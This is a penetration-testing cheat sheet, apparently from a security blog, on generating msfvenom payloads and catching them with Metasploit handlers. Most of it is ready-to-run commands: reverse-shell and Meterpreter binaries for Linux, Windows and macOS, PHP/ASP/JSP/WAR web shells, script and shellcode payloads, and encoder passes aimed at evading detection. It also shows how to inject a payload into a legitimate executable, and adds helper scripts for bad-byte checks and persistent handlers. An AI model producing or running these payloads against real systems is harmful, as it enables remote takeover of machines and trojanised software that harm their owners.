MSFVENOM

For creating one-liner payloads. Handy, dandy, with a sip of brandy.

service postgresql start && service metasploit start

(Newer Kali releases ship no metasploit service; set the database up once with msfdb init and then just launch msfconsole.)

List payloads

msfvenom -l payloads

(-l encoders, -l formats and -l platforms list the other module types.)

List payload options

msfvenom -p windows/shell/reverse_tcp --payload-options

(--list-options in newer versions.)

Binaries

The payloads below are 32-bit. Use the x64 variants (linux/x64/..., windows/x64/..., osx/x64/...) for 64-bit targets: a 32-bit payload cannot be injected into a 64-bit process, and current macOS no longer runs 32-bit binaries at all.

Linux

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf > shell.elf

Windows

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell.exe

Mac

msfvenom -p osx/x86/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f macho > shell.macho

 

Web Payloads

PHP

msfvenom -p php/meterpreter_reverse_tcp LHOST=<IP> LPORT=<PORT> -f raw > shell.php
cat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >> shell.php

The second line prepends the <?php tag that older msfvenom versions leave out of raw PHP output (pbcopy and pbpaste are the macOS clipboard commands; on Linux, add the tag with an editor). Look at the first line of shell.php before deploying it: newer versions emit /*<?php /**/, which already opens PHP mode.
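A portable stand-in for the macOS clipboard trick, added here as an example and not taken from the original page: it prepends the tag only when the first bytes of the file do not already contain one, so it is safe on both old output (no tag) and new output (/*<?php /**/). The file name shell.php is only an assumption for the usage line.

```shell
#!/bin/sh
# Added example, not from the original page: portable replacement for the
# pbcopy/pbpaste trick. Raw PHP output from older msfvenom versions has no
# opening tag; newer versions emit "/*<?php /**/ ..." which already opens
# PHP mode. So only prepend "<?php " when no tag is present in the first
# few bytes of the file.

# ensure_php_tag FILE  -> prints "present" if a tag was found, "added" if
# one was prepended; nonzero exit only on I/O failure.
ensure_php_tag() {
    file=$1
    # Both "<?php ..." and "/*<?php /**/ ..." contain the tag within 16 bytes.
    if head -c 16 "$file" | grep -q '<?php'; then
        echo present
        return 0
    fi
    tmp=$(mktemp) || return 1
    { printf '<?php '; cat "$file"; } > "$tmp" && mv "$tmp" "$file" && echo added
}

# Usage (file name assumed): sh phptag.sh shell.php
if [ $# -eq 1 ]; then
    ensure_php_tag "$1"
fi
```

Run it once over the generated file; a second run reports "present" and leaves the file alone.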

ASP

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> -f asp > shell.asp

JSP

msfvenom -p java/jsp_shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f raw > shell.jsp

WAR

msfvenom -p java/jsp_shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f war > shell.war

The JSP inside the WAR gets a random file name; list it with unzip -l shell.war so you know which URL to request after deploying (for example through the Tomcat manager).

 

Scripting Payloads

Python

msfvenom -p cmd/unix/reverse_python LHOST=<IP> LPORT=<PORT> -f raw > shell.py

Bash

msfvenom -p cmd/unix/reverse_bash LHOST=<IP> LPORT=<PORT> -f raw > shell.sh

Perl

msfvenom -p cmd/unix/reverse_perl LHOST=<IP> LPORT=<PORT> -f raw > shell.pl

These are one-line commands that need the named interpreter on the target. They are not staged, so a plain netcat listener catches them as well as multi/handler with the same cmd/unix payload set.

 

Shellcode

For the valid output formats see msfvenom --list formats (--help-formats in older versions). Msfvenom emits the shellcode as a string literal in the chosen language, ready to paste into your exploit.

Linux Based Shellcode

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> -f <language>

Windows Based Shellcode

Shellcode in Python

msfvenom -a x86 --platform windows -p windows/exec CMD=calc.exe -b "\x00\x0a\x0d" -f python

Shellcode in C

msfvenom -a x86 --platform windows -p windows/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -e x86/shikata_ga_nai -b "\x00\x0a\x0d" -i 3 -f c

-b lists the bytes the shellcode must not contain (here NUL, LF and CR, the usual string-copy terminators). Msfvenom then picks an encoder that avoids them; -e forces a particular encoder and -i sets the number of encoding passes. Note that -x is not the encoder flag: it names a template executable to inject into (see "Inject payload into binary" below).

Mac Based Shellcode

msfvenom -p osx/x86/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f <language>
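The -b option is a request, not a guarantee you have checked. The script below, an added example rather than code from the original page, reads a raw payload (generate it with the same command but -f raw -o payload.bin; that file name is an assumption) and reports any of the listed bytes that survived encoding, using the same \xNN syntax you passed to -b. A surviving bad byte means either the encoder failed or the list was wrong, and the exploit will truncate the shellcode.

```shell
#!/bin/sh
# Added example, not from the original page: confirm that a raw payload
# really avoids the bytes given to msfvenom -b. Generate the payload with
# -f raw (e.g. msfvenom ... -b '\x00\x0a\x0d' -f raw -o payload.bin; the
# file name is an assumption) and run this over it.

# badchars_found FILE BADLIST
#   FILE     raw payload bytes
#   BADLIST  msfvenom -b syntax, e.g. '\x00\x0a\x0d' (case-insensitive)
# Prints each listed byte that occurs in FILE with its count.
# Returns 0 when none occur, 1 when at least one does.
badchars_found() {
    local file badlist found hexes bytes h n
    file=$1
    badlist=$2
    found=0
    # "\x00\x0a\x0d" -> "00 0a 0d", lower-cased to match od's output
    hexes=$(printf '%s' "$badlist" | sed 's/\\x/ /g' | tr 'A-F' 'a-f')
    # od -A n -t x1 -v: plain hex bytes, no addresses, no '*' line folding;
    # tr puts one byte per line so grep -c can count exact matches
    bytes=$(od -A n -t x1 -v "$file" | tr -s ' ' '\n')
    for h in $hexes; do
        n=$(printf '%s\n' "$bytes" | grep -c "^$h\$" || true)
        if [ "$n" -gt 0 ]; then
            printf 'bad byte \\x%s occurs %d time(s)\n' "$h" "$n"
            found=1
        fi
    done
    return $found
}

# Usage: sh badchars.sh payload.bin '\x00\x0a\x0d'
if [ $# -eq 2 ]; then
    badchars_found "$1" "$2"
fi
```

Exit status 0 means the payload is clean for that list, which makes the check easy to put in front of whatever wraps the shellcode into the exploit. Remember that -b only covers the encoded body; the decoder stub itself is chosen to be free of the listed bytes, so a failure here is usually a typo in the list.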

----------------------------------------------------------------------

Expanding a bit more

Windows | Meterpreter

Standard meterpreter

  1. msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.101 LPORT=445 -f exe -o shell_reverse.exe
  2. use exploit/multi/handler
  3. set payload windows/meterpreter/reverse_tcp

Meterpreter HTTPS

Wraps the Meterpreter session in TLS, so to a network that does not intercept TLS the traffic looks like ordinary HTTPS and its contents are hidden from deep-packet inspection. It is not invisible: the handler's default certificate is self-signed and the stager's request pattern is well known, so expect a TLS-terminating proxy or a decent IDS to flag it unless you supply your own certificate (HandlerSSLCert on the handler).

msfvenom -p windows/meterpreter/reverse_https LHOST=192.168.0.101 LPORT=443 -f exe -o met_https_reverse.exe

Non-staged payload

A non-staged (stageless) payload carries everything it needs in the binary, so it can be caught by multi/handler or by a plain listener such as netcat.

  1. msfvenom -p windows/shell_reverse_tcp LHOST=192.168.0.101 LPORT=445 -f exe -o shell_reverse_tcp.exe
  2. use exploit/multi/handler
  3. set payload windows/shell_reverse_tcp

Staged payload

A staged payload (note the extra slash: shell/reverse_tcp rather than shell_reverse_tcp) is only a small stager. The handler sends the rest of the payload over the connection, so it must be caught with multi/handler set to the same staged payload; netcat will not work.

  1. msfvenom -p windows/shell/reverse_tcp LHOST=192.168.0.101 LPORT=445 -f exe -o staged_reverse_tcp.exe
  2. use exploit/multi/handler
  3. set payload windows/shell/reverse_tcp

Inject payload into binary

-x takes an existing executable as a template and puts the payload into it; add -k to keep the template's original behaviour (the payload then runs in a new thread), otherwise the result only runs the payload. The template must match the payload architecture. Nine passes of shikata_ga_nai are for dodging bad bytes and old signature scanners; do not expect them to get past current antivirus.

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.101 LPORT=445 -f exe -e x86/shikata_ga_nai -i 9 -x "/somebinary.exe" -o bad_binary.exe

Handlers

Metasploit handlers are the quickest way to get Metasploit into a position to receive your incoming shells. Set the same payload, LHOST and LPORT you gave msfvenom; a mismatch here is the usual reason a shell never arrives.

Meterpreter

  1. msfconsole -q
  2. use exploit/multi/handler
  3. set payload windows/meterpreter/reverse_tcp
  4. set lhost 192.168.1.123
  5. set lport 4444
  6. run

Using reverse_tcp

  1. msfconsole -q
  2. use exploit/multi/handler
  3. set payload windows/shell/reverse_tcp
  4. set LHOST <IP>
  5. set LPORT <PORT>
  6. run
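Typing the handler by hand each time invites the payload/port mismatch mentioned above. The script below is an added example, not code from the original page or from Metasploit: it writes a msfconsole resource script from the same PAYLOAD, LHOST and LPORT values you gave msfvenom, and adds ExitOnSession false with exploit -j -z so the handler stays up in the background for more than one shell instead of stopping at the first session. The file name handler.rc is an assumption.

```shell
#!/bin/sh
# Added example, not from the original page: build a msfconsole resource
# script for multi/handler from the PAYLOAD/LHOST/LPORT given to msfvenom.
# ExitOnSession false + "exploit -j -z" keeps the listener running as a
# background job so several shells can come in on the same handler.

# handler_rc PAYLOAD LHOST LPORT  -> resource script on stdout
# Returns 1 (with a message on stderr) on an obviously wrong argument.
handler_rc() {
    local payload lhost lport
    payload=$1
    lhost=$2
    lport=$3
    case $payload in
        */*) ;;
        *) echo "handler_rc: payload should look like windows/meterpreter/reverse_tcp" >&2
           return 1 ;;
    esac
    case $lport in
        ''|*[!0-9]*) echo "handler_rc: LPORT must be a number" >&2
                     return 1 ;;
    esac
    if [ "$lport" -lt 1 ] || [ "$lport" -gt 65535 ]; then
        echo "handler_rc: LPORT out of range" >&2
        return 1
    fi
    cat <<EOF
use exploit/multi/handler
set PAYLOAD $payload
set LHOST $lhost
set LPORT $lport
set ExitOnSession false
exploit -j -z
EOF
}

# Usage (file name assumed):
#   sh handler.sh windows/meterpreter/reverse_tcp 192.168.1.123 4444 > handler.rc
#   msfconsole -q -r handler.rc
if [ $# -eq 3 ]; then
    handler_rc "$1" "$2" "$3"
fi
```

Keep the PAYLOAD string identical to the one in the msfvenom command, staged or stageless as the case may be; the handler for windows/shell/reverse_tcp will not catch windows/shell_reverse_tcp and vice versa.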

  

References

Peleus, https://netsec.ws/?p=331
https://xapax.gitbooks.io/security/content/reverse-shell.html